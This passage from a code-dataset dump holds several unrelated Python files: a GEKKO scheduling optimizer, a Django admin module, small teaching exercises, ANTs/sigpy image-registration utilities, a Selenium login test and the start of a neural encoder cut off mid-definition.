get_resource_constraints(order)\n for constraint in resource_constraints:\n task = constraint[1]\n prev = constraint[0]\n m.Equation(c[prev] + (w[task] / s[task]) <= c[task])\n\n # all tasks on single machine must run at same speed\n if not task_scaling:\n for machine in order:\n for i in range(len(machine)):\n if i != len(machine)-1:\n m.Equation(s[machine[i]] == s[machine[i+1]])\n\n P = m.Var(value=5, lb=0)\n m.Equation(m.sum([w[j] * s[j] for j in range(num_tasks)]) == P)\n\n M = m.Var(value=5, lb=0)\n MRT = m.Var(value=5, lb=0)\n\n\n for j in range(num_tasks):\n m.Equation(c[j] <= M)\n\n for lst in order:\n m.Equation(sum([w[i] / s[i] for i in lst]) <= M)\n\n # define MRT\n m.Equation(m.sum([c[j] for j in range(num_tasks)]) == MRT)\n\n if mrt: \n m.Obj(MRT + P)\n\n else:\n\n m.Obj(P + M) # Objective\n\n \n return m, s, c\n\n\ndef init_opt_solver(mrt, G, num_tasks, num_machines, w):\n \"\"\"\n prepares the optimization equation by adding the necessary constraints\n :param mrt: Boolean variable that is True if objective is to optimize for \n MRT + E, False if objective is to optimize Makespan + E.\n :param G: DAG to schedule\n :param num_tasks: total number of tasks\n :param w: weights\n :return: m, s, c\n \"\"\"\n m = GEKKO()\n\n # Use IPOPT solver (default)\n m.options.SOLVER = 3\n\n # Change to parallel linear solver\n m.solver_options = ['minlp_max_iter_with_int_sol 10000']\n\n # create array\n s = m.Array(m.Var, num_tasks)\n for i in range(num_tasks):\n s[i].value = 2.0\n s[i].lower = 0\n\n # define completion time of each task\n c = m.Array(m.Var, num_tasks)\n for i in range(num_tasks):\n c[i].value = 0\n c[i].lower = 0\n\n x = [[m.sos1([0,1]) for j in range(num_tasks)] for i in range(num_machines)]\n\n #Yu's constraints that you can uncomment\n p = [[m.sos1([0,1]) for j in range(num_tasks)] for j_prime in range(num_tasks)] \n b = [[m.sos1([0,1]) for j in range(num_tasks)] for j_prime in range(num_tasks)] \n\n # 1a\n # each task will be assigned to exactly one machine\n for j in range(num_tasks):\n m.Equation(m.sum([x[i][j] for i in range(num_machines)]) == 1)\n\n # 1b\n # task's completion time must be later than the time to run task itself\n for j in range(num_tasks):\n m.Equation( w[j] / s[j] <= c[j])\n\n # 1c\n # task must start later than all ancestors\n for j in range(num_tasks):\n for k in nx.algorithms.ancestors(G, j):\n m.Equation(c[k] + (w[j] / s[j]) <= c[j])\n\n M = m.Var(value=5, lb=0)\n P = m.Var(value=5, lb=0)\n MRT = m.Var(value=5, lb=0)\n\n # Yu's constraints that you can uncomment\n for j_prime in range(num_tasks):\n for j in range(num_tasks):\n if j != j_prime:\n m.Equation(m.sum([x[i][j] * x[i][j_prime] for i in range(num_machines)]) == p[j][j_prime])\n\n for j_prime in range(num_tasks):\n for j in range(num_tasks):\n if j != j_prime:\n m.Equation(p[j][j_prime] * (c[j] - c[j_prime] + (w[j_prime] / s[j_prime])) <= b[j][j_prime] * (\n M - c[j_prime] + (w[j_prime] / s[j_prime])))\n m.Equation(b[j][j_prime] * (c[j_prime] + (w[j]/s[j])) <= p[j][j_prime] * c[j])\n m.Equation(b[j][j_prime] <= p[j][j_prime])\n b[j][j_prime] = m.if3(b[j_prime][j] - 1, 1, 0)\n\n\n # Total load assigned to each machine should not be greater than the makespan\n for i in range(num_machines):\n m.Equation(m.sum([w[j] * x[i][j] / s[j] for j in range(num_tasks)]) <= M)\n\n # 1e (define M in objective function)\n for j in range(num_tasks):\n m.Equation(c[j] <= M)\n\n # define P in objective function\n m.Equation(m.sum([w[j] * s[j] for j in range(num_tasks)]) == P)\n\n # define MRT\n m.Equation(m.sum([c[j] for j in range(num_tasks)]) == MRT)\n\n if mrt: \n m.Obj(MRT + P)\n\n else:\n\n m.Obj(P + M) # Objective\n \n\n # Old Objective\n # m.Obj(sum([int(v[i]) / s[i] + s[i] for i in range(len(v))]))\n\n # objective for mean completion time\n \n return x, m, s, c\n\ndef get_resource_constraints(order):\n \"\"\"\n gets resource constraints for a given ordering\n :param order:\n :return: resource constraints\n \"\"\"\n resource_constraints = []\n for machine in order:\n for i in range(len(machine)):\n if i != len(machine) -1:\n task = machine[i]\n next_task = machine[i+1]\n resource_constraints.append([task, next_task])\n\n return resource_constraints\n\n\ndef solver_results(x, s, m, c, w, order=False, verbose=True):\n \"\"\"\n solves the optimization equation\n :param s: speeds\n :param m: gekko model\n :param c: completion times\n :param verbose: boolean to print or not\n :param order: optional order to print or not\n :return: task_process_time, ending times, intervals, speeds, objective value\n \"\"\"\n\n #m.Obj(O) # Objective\n\n try:\n m.options.IMODE = 3 # Steady state optimization\n m.solve(disp=verbose) # Solve\n\n except:\n print(\"Did not work\")\n if order!=False:\n print(\"Order is \", order)\n return order, [-1]*len(s), [-1]*len(s), [-1,-1]*len(s),[-1]*len(s), 10000000\n\n task_process_time = [frac(w[i] / frac(s[i].value[0])) for i in range(len(s))]\n ending_time = [frac(c[i].value[0]) for i in range(len(c))]\n intervals = [[end - process_time, end] for (process_time, end) in zip(task_process_time, ending_time)]\n speeds = [frac(s[i].value[0]) for i in range(len(s))]\n\n task_process_time = [float(process_time.__round__(5)) for process_time in task_process_time]\n ending_time = [float(end_time.__round__(5)) for end_time in ending_time]\n intervals = [[float(interval[0].__round__(5)), float(interval[1].__round__(5))] for interval in intervals]\n speeds = [float(speed.__round__(5)) for speed in speeds]\n \n if verbose:\n print('Results')\n for i in range(len(s)):\n print(str(i) + \" Speed: \" + str(s[i].value) + \" Ending Time: \" + str(c[i].value) + \" Interval: \" +\n str(intervals[i]) + \" Task process time: \" + str(task_process_time[i]))\n print('Objective: ' + str(m.options.objfcnval))\n\n\n if x != None: \n order = create_order(x, c)\n else:\n order = None\n\n return order, task_process_time, ending_time, intervals, speeds, float(frac(m.options.objfcnval).__round__(5))\n\n\n\n\n\n\n\ndef create_order(x, c):\n\n order = []\n \n num_machines = len(x)\n num_tasks = len(c)\n\n for i in range(num_machines):\n machine_unordered = []\n for j in range(num_tasks):\n if int(round(x[i][j].value[0])) == 1:\n machine_unordered.append((c[j].value[0], j))\n\n machine_sorted = sorted(machine_unordered)\n machine_order = []\n \n for k in range(len(machine_sorted)):\n \n machine_order.append(machine_sorted[k][1])\n order.append(machine_order)\n \n\n return order\n\ndef get_objective(ending_times, speeds):\n \"\"\"\n Calculates objective given a schedule\n :param ending_times: completion times for a task\n :param speeds: speeds of tasks running\n :return:\n \"\"\"\n return sum([ending_times[i] + speeds[i] for i in range(len(speeds))])\n\n\ndef get_machines(order, num_tasks):\n \"\"\"\n returns list of task machine mappings\n :param order: order of tasks across machines\n :param num_tasks: number of total tasks\n :return:\n \"\"\"\n machines = num_tasks * [-1]\n for machine_index in range(len(order)):\n for task in order[machine_index]:\n machines[task] = machine_index\n return machines\n\n\ndef make_task_metadata(order, num_tasks, intervals):\n \"\"\"\n makes data ready to be plotted on a pretty gantt chart\n :param order: machine task ordering\n :param num_tasks: total number of tasks for the dag\n :param intervals: start end time 2d list\n :return: a dict of metadata with subdict for fields\n \"\"\"\n task_metadata = {}\n machines = get_machines(order, num_tasks)\n for task_name in range(len(intervals)):\n\n task_metadata[task_name] = {'start': intervals[task_name][0], 'end': intervals[task_name][1],\n 'task': task_name, 'machine': machines[task_name]}\n return task_metadata\n\n\ndef plot_gantt(task_metadata, objective_value, color_palette):\n \"\"\"\n plots the task_speed_scaling gantt chart given the metadata\n :param task_metadata: metadata\n :param objective_value: value of objective for current value\n :param color_palette: rgb tuples for colors to use\n :return:\n \"\"\"\n df = []\n colors = {}\n # print(task_metadata)\n for task_key in task_metadata:\n task = task_metadata[task_key]\n df.append(dict(Task=str(\"Machine \" + str(task['machine'])), Start=task['start'], Finish=task['end'], Machine=task['task']))\n if task['task'] < len(color_palette):\n color = color_palette[task['task']]\n else:\n color = (random.uniform(0, 1), random.uniform(0, 1), random.uniform(0, 1))\n color_palette.append(color)\n colors[task['task']] = color\n title = \"Speed Scaling Gantt Chart for Objective: \" + str(objective_value)\n fig = ff.create_gantt(df, colors=colors, index_col='Machine', show_colorbar=True, group_tasks=True, showgrid_x=True, showgrid_y=True, title=title)\n fig.update_xaxes(type='linear')\n fig.show(\"notebook\")\n return color_palette\n\n\nif __name__ == \"__main__\":\n dag = nx.DiGraph()\n dag.add_nodes_from(range(9))\n dag.add_edges_from([(0, 2), (2, 3), (2, 4), (3, 5), (4, 5), (5, 6), (6, 7), (7, 8)])\n\n # Sample test\n order = [[0, 2, 3, 5, 6, 7, 8], [4, 1]]\n v = [9, 1, 8, 5, 2, 4, 3, 2, 1]\n m, s, c = init_solver(dag, v, order)\n task_processing_time, ending_time, intervals, obj = solver_results(s, m, c)\n task_metadata = make_task_metadata(order, 9, intervals)\n plot_gantt(task_metadata, obj)\n print(\"finished test hopefully it worked\")","sub_path":"conjecture/optimization_functions.py","file_name":"optimization_functions.py","file_ext":"py","file_size_in_byte":11676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"450643123","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.utils.translation import gettext_lazy as _\n\nfrom import_export.admin import ImportExportModelAdmin\nfrom import_export.fields import Field\nfrom import_export import resources\n\nfrom fleet_management.models import Car, Drive, User, Project, Refuel\n\n\nclass CountryFilter(admin.SimpleListFilter):\n title = _(\"Country\")\n parameter_name = \"country\"\n\n def lookups(self, request, model_admin):\n objects = model_admin.model.objects.distinct(self.parameter_name)\n countries = [(o.country.code, o.country.name) for o in objects]\n countries = sorted(countries, key=lambda c: c[1]) # sort by name, A-Z\n return [(\"ALL\", _(\"Global\"))] + countries\n\n def queryset(self, request, queryset):\n value = self.value()\n\n # \"ALL\" is special value used for showing global users (with empty country)\n if value == \"ALL\":\n value = \"\"\n\n if value is not None:\n return queryset.filter(**{self.parameter_name: value})\n\n return queryset\n\n\nclass DriveResource(resources.ModelResource):\n diff_mileage = Field(attribute=\"diff_mileage\")\n fuel_consumption = Field(attribute=\"fuel_consumption\")\n\n class Meta:\n model = Drive\n fields = (\n \"id\",\n \"date\",\n \"country\",\n \"is_verified\",\n \"project__title\",\n \"description\",\n \"start_mileage\",\n \"end_mileage\",\n \"diff_mileage\",\n \"start_location\",\n \"end_location\",\n \"driver\",\n \"passenger\",\n \"car__plates\",\n \"fuel_consumption\",\n )\n export_order = fields\n\n def dehydrate_country(self, drive):\n return str(drive.country.name)\n\n def dehydrate_driver(self, drive):\n return str(drive.driver)\n\n def dehydrate_passenger(self, drive):\n return str(drive.passenger)\n\n\n@admin.register(Drive)\nclass DriveAdmin(ImportExportModelAdmin):\n resource_class = DriveResource\n list_filter = (CountryFilter,)\n list_display = (\n \"date\",\n \"start_location\",\n \"end_location\",\n \"driver\",\n \"passenger\",\n \"country\",\n \"is_verified\",\n )\n\n\n@admin.register(Car)\nclass CarAdmin(admin.ModelAdmin):\n list_filter = (CountryFilter,)\n list_display = (\"plates\", \"description\", \"fuel_consumption\", \"country\")\n\n\n@admin.register(Project)\nclass ProjectAdmin(admin.ModelAdmin):\n list_filter = (CountryFilter,)\n list_display = (\"title\", \"country\")\n\n\n@admin.register(User)\nclass CustomUserAdmin(UserAdmin):\n list_filter = (\"groups\", CountryFilter)\n list_display = (\n \"username\",\n \"first_name\",\n \"last_name\",\n \"country\",\n \"is_staff\",\n \"last_seen\",\n )\n\n fieldsets = (\n (None, {\"fields\": (\"username\", \"password\")}),\n (\n _(\"Personal info\"),\n {\"fields\": (\"first_name\", \"last_name\", \"email\", \"country\")},\n ),\n (\n _(\"Permissions\"),\n {\n \"fields\": (\n \"is_active\",\n \"is_staff\",\n \"is_superuser\",\n \"groups\",\n \"user_permissions\",\n )\n },\n ),\n (_(\"Important dates\"), {\"fields\": (\"last_seen\", \"last_login\", \"date_joined\")}),\n )\n\n\n@admin.register(Refuel)\nclass RefuelAdmin(admin.ModelAdmin):\n list_filter = (\n \"driver\",\n \"car\",\n )\n list_display = (\n \"driver\",\n \"car\",\n \"date\",\n \"current_mileage\",\n \"refueled_liters\",\n \"price_per_liter\",\n \"total_cost\",\n )\n","sub_path":"backend/fleet_management/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"277387585","text":"# -*- coding: utf-8 -*-\n\n# (цикл while)\n\n# даны целые положительные числа a и b (a > b)\n# с a на b, с помощью цикла while,\n# __НЕ__ используя стандартную операцию целочисленного деления (// и %)\n# Формат вывода:\n# Целочисленное деление ХХХ на YYY дает ZZZ\n\na, b = 142523, 4435\n\nwhile a > b:\n result = int(a / b)\n print('Целочисленное деление', a, 'на', b, 'дает', result)\n break\nelse:\n print('некорректный ввод')","sub_path":"lesson_003/03_division.py","file_name":"03_division.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"313217448","text":"import argparse\nimport sentencepiece as spm\n\nif __name__ == \"__main__\":\n\t\n\tparser = argparse.ArgumentParser(description='learn bpe like a pro')\n\tparser.add_argument('--input', '-i', type=str, help='input file')\n\tparser.add_argument('--model', '-m', type=str, help='Model prefix')\n\tparser.add_argument('--vocab_size', '-v', type=int, help='vocab size')\n\targs = parser.parse_args()\n\n\tspm.SentencePieceTrainer.Train(f\"--model_type=bpe --input={args.input} --model_prefix={args.model} --vocab_size={args.vocab_size}\")\n\t\n","sub_path":"utils/bpe-learn.py","file_name":"bpe-learn.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"645406358","text":"def move(no, x, y):\r\n \"\"\"원반을 no개를 X 기둥에서 y 기둥으로 옮김\"\"\"\r\n if no > 1:\r\n move(no - 1, x, 6 - x - y)\r\n\r\n print(f'원반 [{no}]을(를) {x}기둥에서 {y}기둥으로 옮깁니다.')\r\n\r\n if no > 1:\r\n move(no - 1, 6 - x - y, y)\r\n\r\nprint('하노이의 탑을 구현하는 프로그램입니다.')\r\nn = int(input('원반의 개수를 입력하세요: '))\r\n\r\nmove(n, 1, 3)\r\nprint()","sub_path":"hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"457043272","text":"import sigpy as sp\nimport numpy as np\nimport os, glob\nimport nibabel \nfrom sigpy.linop import Linop\nfrom sigpy import backend\nimport scipy.ndimage as ndimage\nfrom scipy.io import loadmat\nfrom scipy import linalg\nimport ants\n\n__all__ = ['interp_op', 'interp', 'ANTsReg', 'ANTsAff', 'interp_affine_op']\n\ndef M_scale2(M, oshape, scale = 1):\n Mscale = [oshape[i]/M.shape[i+1] for i in range(M.shape[0])]\n Mo = np.zeros((M.shape[0],)+oshape)\n for i in range(M.shape[0]):\n M[i] = M[i]*(Mscale[i]*scale)\n Mo[i] = ndimage.zoom(M[i],zoom=tuple(Mscale),order=1)\n\n return Mo\n\ndef M_scale(M, oshape, scale = 1):\n Mscale = [oshape[i]/M.shape[i] for i in range(M.shape[-1])]\n Mo = np.zeros(oshape+(M.shape[-1],))\n for i in range(M.shape[-1]):\n M[...,i] = M[...,i]*(Mscale[i]*scale)\n Mo[...,i] = ndimage.zoom(M[...,i],zoom=tuple(Mscale),order=2)\n\n return Mo\n\ndef ANTsAff(If,Im,vox_res = [1,1,1], reg_level = [8,4,2], gauss_filt = [2,2,1]):\n # transfer to nifti\n Ifnft = nibabel.Nifti1Image(If,affine=np.diag(vox_res+[1]))\n Imnft = nibabel.Nifti1Image(Im,affine=np.diag(vox_res+[1]))\n \n nibabel.save(Ifnft,'./tmp_If.nii')\n nibabel.save(Imnft,'./tmp_Im.nii')\n \n reg_level_s = 'x'.join([str(t) for t in reg_level])\n gauss_filt_s = 'x'.join([str(t) for t in gauss_filt])\n \n ants_cmd = 'antsRegistration -d 3 -m MI[ {}, {}, 1, 50 ] -t Rigid[0.1] \\\n -c [ 100x100x40, 1e-6, 10 ] -s {}vox -f {} --winsorize-image-intensities [0.1,1]\\\n -l 1 -u 1 -z 1 -v -o tmp_'.format('tmp_Im.nii','tmp_If.nii',gauss_filt_s,reg_level_s)\n os.system(ants_cmd)\n x = loadmat('./tmp_0GenericAffine.mat')\n T = x['AffineTransform_double_3_3'].reshape([4,3])\n\n # ANTs orientation\n M_rot = [[1,-1,1],[-1,1,1],[1,1,1],[1,1,-1]]\n T = T*M_rot\n T[3,...] = T[3,...].dot(linalg.inv(T[:3]))\n \n return T\n\nclass interp_affine_op(Linop):\n def __init__(self, ishape, T):\n assert list(T.shape) == [4,3],\"Tmatrix Dimension mismatch!\"\n oshape = ishape\n self.T = T\n super().__init__(oshape, ishape)\n\n def _apply(self, input):\n return interp_affine(input,self.T)\n\n def _adjoint_linop(self):\n T = self._aff_inversion(self.T)\n\n return interp_affine_op(self.ishape, T)\n \n def _aff_inversion(self,T):\n T_inv = np.zeros_like(T)\n T_inv[:3,:] = np.linalg.inv(T[:3,:])\n T_inv[3,:] = -T[3,:].dot(T[:3,:].transpose())\n return T_inv\n \ndef interp_affine(I, T, aff_order = 1):\n # T should be [4,3], [:3,3] rotation, [3,:] shift\n shift_before_rot = T[3,:]\n shift_after_rot=shift_before_rot.dot(T[:3,:].transpose())\n shift_after_rot = -T[3,:]\n AT = lambda x: ndimage.affine_transform(x,T[:3,:],offset=-shift_after_rot,order=aff_order)\n if np.iscomplexobj(I) is True:\n I_aff = AT(np.real(I)) + 1j * AT(np.imag(I))\n else:\n I_aff = AT(I)\n \n return I_aff\n \ndef ANTsReg4(Is,ref = 0):\n M_fields = []\n iM_fields = []\n nphase = len(Is)\n for i in range(nphase):\n M_field, iM_field = ANTsReg(np.abs(Is[2]), np.abs(Is[i]))\n\n M_fields.append(M_field)\n iM_fields.append(iM_field)\n # change\n np.save('./M_field.npy',np.asarray(M_fields))\n np.save('./iM_field.npy',np.asarray(iM_fields))\n\ndef ANTsReg(If,Im,vox_res = [1,1,1], reg_level = [8,4,2], gauss_filt = [2,2,1]):\n\n fixed = ants.from_numpy(Im)\n moving = ants.from_numpy(If)\n \n tmp_dir = 'tmp{}_'.format(np.random.randint(0,1e4))\n \n reg_dict = ants.registration(fixed, moving, type_of_transform='SyNOnly', initial_transform=\"identity\",\\\n syn_metric='demons', syn_sampling=4, \\\n grad_step=0.1, flow_sigma=5, total_sigma=3,\\\n reg_iterations=(100,100,40,20,10), \\\n verbose=False, outprefix=tmp_dir, \\\n w='[0.1,1]', write_composite_transform=False)\n # -s -f -l not matched\n M_field = nibabel.load(reg_dict['fwdtransforms'][0])\n iM_field = nibabel.load(reg_dict['invtransforms'][-1])\n \n Mt = M_field.get_fdata()\n iMt = iM_field.get_fdata()\n \n #Mt = -M_field.get_fdata()\n #iMt = -iM_field.get_fdata()\n #Mt[...,:2] = -Mt[...,:2]\n #iMt[...,:2] = -iMt[...,:2]\n \n Mt = np.squeeze(Mt)\n iMt = np.squeeze(iMt)\n #Mt = M_scale(Mt,If.shape,1/reg_level[-1])\n #iMt = M_scale(iMt,If.shape,1/reg_level[-1])\n fileList = glob.glob(tmp_dir + '*')\n # Iterate over the list of filepaths & remove each file.\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n continue\n \n return Mt, iMt\n\n## get Jacobian, Specific Ventilation\ndef ANTsJac(If,Im,vox_res = [1,1,1], reg_level = [8,4,2], gauss_filt = [2,2,1]):\n # to antsimage\n fixed = ants.from_numpy(Im)\n moving = ants.from_numpy(If)\n \n tmp_dir = 'tmp{}_'.format(np.random.randint(0,1e4))\n # SyN registration\n reg_dict = ants.registration(fixed, moving, type_of_transform='SyNOnly', \\\n syn_metric='demons', syn_sampling=4, \\\n grad_step=0.1, flow_sigma=5, total_sigma=3,\\\n reg_iterations=(100,100,40,20,10), \\\n verbose=False, outprefix=tmp_dir, \\\n w='[0.1,1]')\n \n # Jacobian \n jac_ants = ants.create_jacobian_determinant_image(fixed,reg_dict['invtransforms'][-1])\n jac = jac_ants.numpy()\n \n # calculate specific ventilation \n reg_ants = reg_dict['warpedfixout']\n reg = reg_ants.numpy()\n \n reg = ndimage.filters.gaussian_filter(reg, (3,3,3), mode='reflect', truncate=1)\n If = ndimage.filters.gaussian_filter(If, (3,3,3), mode='reflect', truncate=1)\n \n sv = (If - reg) / (reg + np.finfo(float).eps)\n \n\n # Get a list of all the file paths that ends with .txt from in specified directory\n fileList = glob.glob(tmp_dir + '*')\n # Iterate over the list of filepaths & remove each file.\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n continue\n\n return jac, sv\n\n## Demons registration\ndef imgrad3d(I):\n gx = I-sp.circshift(I,(-1,),axes=(0,))\n gx[-1,:,:]=0 \n gy = I-sp.circshift(I,(-1,),axes=(1,))\n gy[:,-1,:]=0 \n gz = I-sp.circshift(I,(-1,),axes=(2,))\n gz[:,:,-1]=0 \n \n return gx,gy,gz\n\ndef lap3d(I):\n gxx = sp.circshift(I,(-1,),axes=(0,)) + sp.circshift(I,(1,),axes=(0,)) - 2*I\n gyy = sp.circshift(I,(-1,),axes=(1,)) + sp.circshift(I,(1,),axes=(1,)) - 2*I\n gzz = sp.circshift(I,(-1,),axes=(2,)) + sp.circshift(I,(1,),axes=(2,)) - 2*I\n lapI = gxx + gyy + gzz\n return lapI\n\ndef pmask(I,sigma):\n # TODO: optimize\n I = np.abs(I)\n mask = np.abs(I)>sigma\n mask = ndimage.morphology.binary_fill_holes(mask)\n mask = ndimage.morphology.binary_opening(mask,structure=np.ones((5,5,5)))\n return mask\n\ndef DemonsReg4(Is,ref = 0, level = 3, device = -1):\n M_fields = []\n iM_fields = []\n nphase = len(Is)\n print('4D Demons registration:')\n for i in range(nphase):\n print('Ref/Mov:{}/{}'.format(i,ref))\n M_field = Demons(np.abs(Is[ref]), np.abs(Is[i]), level = level, device = device)\n M_fields.append(M_field)\n \n return np.asarray(M_fields)\n\ndef Demons(If, Im, level, device = -1, rho = 0.7,\n sigmas_f = [2,2,2,3],sigmas_e = [2,2,2,2],sigmas_s = [.5,.5,1,1],iters = [40,40,40,20,20]):\n ### normalization??\n Im = np.abs(Im)\n m_scale = np.max(Im)\n Im = Im/m_scale\n If = np.abs(If)\n If = If/m_scale\n \n ### registration\n M = np.zeros(Im.shape+(3,))\n Mt = np.zeros(Im.shape+(3,))\n for k in range(level):\n print('Demons Level:{}'.format(k))\n ### hyperparameter assignment\n scale = 2**(level-k-1)\n sigma_f = sigmas_f[k]\n sigma_e = sigmas_e[k]\n sigma_s = sigmas_s[k]\n iter_each_level = iters[k]\n\n ###\n Ift = ndimage.zoom(If,zoom=1/scale,order=2)\n Ift = ndimage.gaussian_filter(Ift,sigma=sigma_s,truncate=2.0)\n Imt = ndimage.zoom(Im,zoom=1/scale,order=2)\n Imt = ndimage.gaussian_filter(Imt,sigma=sigma_s,truncate=2.0)\n Imask = pmask(Imt+Ift,1e-2)\n\n Isizet = Ift.shape \n Mt = M_scale(Mt,Isizet)\n uo = np.zeros_like(Mt)\n for i in range(iter_each_level):\n\n Imm = interp(Imt, Mt ,device = sp.Device(device),k_id = 1)\n Ifm = interp(Ift, -Mt ,device = sp.Device(device),k_id = 1)\n dI = Ifm-Imm\n Is = (Ifm+Imm)/2\n # Is = ndimage.gaussian_filter((Ifm+Imm)/2,sigma=sigma_s,truncate=2.0)\n\n gIx,gIy,gIz = imgrad3d(Is)\n gI = np.sqrt(np.abs(gIx**2+gIy**2+gIz**2)+1e-6)\n discriminator = gI**2 + np.abs(dI)**2\n dI = dI * 3.0\n ux = -dI*gIx/discriminator\n uy = -dI*gIy/discriminator\n uz = -dI*gIz/discriminator\n\n mask = (gI<1e-4)|(~Imask)\n ux[np.isnan(ux)|mask]=0\n uy[np.isnan(uy)|mask]=0\n uz[np.isnan(uz)|mask]=0\n\n ux = np.maximum(np.minimum(ux,1),-1)\n uy = np.maximum(np.minimum(uy,1),-1)\n uz = np.maximum(np.minimum(uz,1),-1)\n ux = ndimage.gaussian_filter(ux,sigma=sigma_f)\n uy = ndimage.gaussian_filter(uy,sigma=sigma_f)\n uz = ndimage.gaussian_filter(uz,sigma=sigma_f)\n\n\n Mt[...,0] = Mt[...,0] + rho * ux + (1-rho)*uo[...,0]\n Mt[...,1] = Mt[...,1] + rho * uy + (1-rho)*uo[...,1]\n Mt[...,2] = Mt[...,2] + rho * uz + (1-rho)*uo[...,2]\n uo[...,0] = ux\n uo[...,1] = uy\n uo[...,2] = uz\n\n Mt[...,0] = ndimage.gaussian_filter(Mt[...,0],sigma=sigma_e)\n Mt[...,1] = ndimage.gaussian_filter(Mt[...,1],sigma=sigma_e)\n Mt[...,2] = ndimage.gaussian_filter(Mt[...,2],sigma=sigma_e)\n \n ### TODO inverse combination (right now just double)\n M = M_scale(Mt*2,Im.shape) \n return M\n\n\n\n## interpolation operator\nclass interp_op(Linop):\n def __init__(self, ishape, M_field, iM_field = None):\n ndim = M_field.shape[-1]\n assert list(ishape) == list(M_field.shape[:-1]),\"Dimension mismatch!\"\n oshape = ishape\n self.M_field = M_field\n self.iM_field = iM_field\n super().__init__(oshape, ishape)\n\n def _apply(self, input):\n device = backend.get_device(input)\n\n with device:\n return interp(input, self.M_field, device, 1) # major change\n\n def _adjoint_linop(self):\n device = backend.get_device(input)\n if self.iM_field is None:\n iM_field = -self.M_field\n M_field = None\n else:\n iM_field = self.iM_field\n M_field = self.M_field\n\n return interp_op(self.ishape, iM_field, M_field)\n \ndef interp(I, M_field, device = sp.Device(-1), k_id = 1, deblur = True):\n # b spline interpolation\n N = 64\n if k_id is 0:\n kernel = [(3*(x/N)**3-6*(x/N)**2+4)/6 for x in range(0,N)]+[(2-x/N)**3/6 for x in range(N,2*N)]\n dkernel = np.array([-.2,1.4,-.2])\n \n k_wid = 4\n else:\n kernel = [1-x/(2*N) for x in range(0,2*N)]\n dkernel = np.array([0,1,0])\n deblur = False\n k_wid = 2\n kernel = np.asarray(kernel)\n \n c_device = sp.get_device(I)\n ndim = M_field.shape[-1]\n \n # 2d/3d\n if ndim is 3:\n dkernel = dkernel[:,None,None]*dkernel[None,:,None]*dkernel[None,None,:]\n Nx,Ny,Nz = I.shape\n my,mx,mz = np.meshgrid(np.arange(Ny),np.arange(Nx),np.arange(Nz))\n m = np.stack((mx,my,mz),axis=-1)\n M_field = M_field + m\n else:\n dkernel = dkernel[:,None]*dkernel[None,:]\n Nx,Ny = I.shape\n my,mx = np.meshgrid(np.arange(Ny),np.arange(Nx))\n m = np.stack((mx,my,mz),axis=-1)\n M_field = M_field + m\n # TODO remove out of range values\n \n # image warp\n \n g_device = device\n I = sp.to_device(input=I,device=g_device)\n from importlib_metadata import version\n if version('sigpy') <= '0.1.16':\n I = sp.interp.interpolate(I,k_wid,kernel,M_field.astype(np.float64)) # v0.1.16 (input, width, kernel, coord)\n else: \n M_field_device = sp.to_device(input=M_field.astype(np.float64), device=g_device) # v0.1.17\n I = sp.interp.interpolate(input=I,coord=M_field_device) # v0.1.17 (input, coord, kernel='spline', width=2, param=1)\n # deconv\n if deblur is True:\n sp.conv.convolve(I,dkernel)\n I = sp.to_device(input=I,device=c_device)\n \n return I\n","sub_path":"imoco_py/sigpy_e/reg.py","file_name":"reg.py","file_ext":"py","file_size_in_byte":12699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"295551270","text":"#coding:utf-8\nfrom selenium import webdriver\nimport unittest\nfrom pages.login_page import LoginPage,login_url\nimport time\n\n'''\n1,输入用户名,输入密码,点击登录\n2,输入用户名,不输入密码,点击登录\n3,输入错误的用户名,密码,点击登录\n4,点击忘记密码\n'''\n\nclass LoginPageCase(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Firefox()\n cls.loginp = LoginPage(cls.driver)\n\n def setUp(self):\n self.driver.get(login_url)\n self.loginp.is_exist_alert()\n self.driver.delete_all_cookies()\n self.driver.refresh()\n\n def test_01(self):\n '''输入用户名,输入密码,点击登录'''\n self.loginp.input_user(\"zhouyanping\")\n self.loginp.input_pwd(\"zhouyanping\")\n self.loginp.click_login_button()\n gu = self.loginp.get_login_info()\n assert gu == \"周艳萍\"\n\n def test_02(self):\n '''输入用户名,不输入密码,点击登录'''\n self.loginp.input_user(\"zhouyanping\")\n self.loginp.click_login_button()\n gu = self.loginp.get_login_info()\n assert gu == \"\"\n\n def test_03(self):\n '''输入错误的用户名,密码,点击登录'''\n self.loginp.input_user(\"zhouyanping\")\n self.loginp.input_pwd(\"123456\")\n self.loginp.click_login_button()\n gu = self.loginp.get_login_info()\n assert gu == \"\"\n\n def test_04(self):\n '''点击忘记密码'''\n self.loginp.click_forget_pwd()\n gu = self.loginp.get_element()\n assert gu == \"刷新\"\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n\n\n\n\n","sub_path":"case/test_login_case.py","file_name":"test_login_case.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"227957817","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport numpy as np\nimport torch.nn.functional as F\nclass Encode(nn.Module):\n\n def __init__(self,x_dim,z_dim,hidden_dim,vocab_size,dropout,bsz,device_id):\n super(Encode, self).__init__()\n self.x_dim = x_dim\n self.z_dim = z_dim\n self.hidden_dim = hidden_dim\n self.bsz = bsz\n self.device_id = device_id\n self.lstm = nn.LSTM(x_dim, hidden_dim,dropout=dropout)\n self.fc21 = nn.Linear(hidden_dim, z_dim) #mean\n self.drop = nn.Dropout(dropout)\n self.fc5 = 